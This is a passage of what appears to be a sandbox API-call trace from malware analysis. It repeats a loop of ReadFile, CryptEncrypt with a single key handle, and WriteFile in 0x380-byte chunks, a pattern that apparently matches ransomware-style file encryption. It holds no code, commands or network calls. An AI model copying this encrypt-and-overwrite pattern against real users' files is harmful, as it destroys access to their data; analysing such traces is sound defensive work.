pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.353] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.353] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.354] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.354] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.355] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.355] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.356] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.356] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.357] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.357] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.358] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.358] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.359] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.359] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.360] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.360] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, 